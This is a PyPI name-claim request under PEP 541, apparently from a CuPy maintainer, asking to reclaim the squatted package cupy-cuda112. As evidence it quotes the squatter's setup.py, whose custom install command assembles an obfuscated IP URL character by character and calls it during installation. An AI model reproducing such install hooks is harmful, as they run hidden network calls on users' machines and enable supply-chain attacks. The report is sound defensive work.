Project to be claimed

cupy-cuda112: https://pypi.org/project/cupy-cuda112

Your PyPI username

kmaehashi: https://pypi.org/user/kmaehashi

Reasons for the request

I believe this project can be considered as "Invalid projects" as specified in PEP 541. Specifically,

project is malware (designed to exploit or harm systems or users);

The project contains a setup.py file that sends a request to a malicious URL during installation.

class CustomInstallCommand(install):
    def run(self):
        install.run(self)
        url = "h"+"t"+"t"+"p"+":"+"/"+"/"+"1"+"0"+"1"+"."+"3"+"2"+"."+"9"+"9"+"."+"2"+"8"+"/name?cupy-cuda112"
        requests.get(url, timeout=30)

setup(
    name='cupy-cuda112',
    version='2.2.2',
    author='RemindSupplyChainRisks',
    author_email='RemindSupplyChainRisks@gmail.com',
    url='https://github.com/cupy-cuda112',
    description='Remind Supply Chain Risks',
    packages=['cupy-cuda112'],
    install_requires=['requests'],
    cmdclass={
        'install': CustomInstallCommand,
    },
)

project is name squatting (package has no functionality or is empty);

The package only contains __init__.py file, that says:

# the purpose is to make everyone pay attention to software supply chain attacks, because the risks are too great.

CuPy has been maintaining a package using cupy-cudaXXX naming scheme for years. Obviously the intention is to squat the (future) package name.

Maintenance or replacement?

I would like to use the package name cupy-cuda112.

https://github.com/cupy/cupy

Contact and additional research

No email addresses or any contact information available for https://pypi.org/user/RemindSupplyChainRisks/.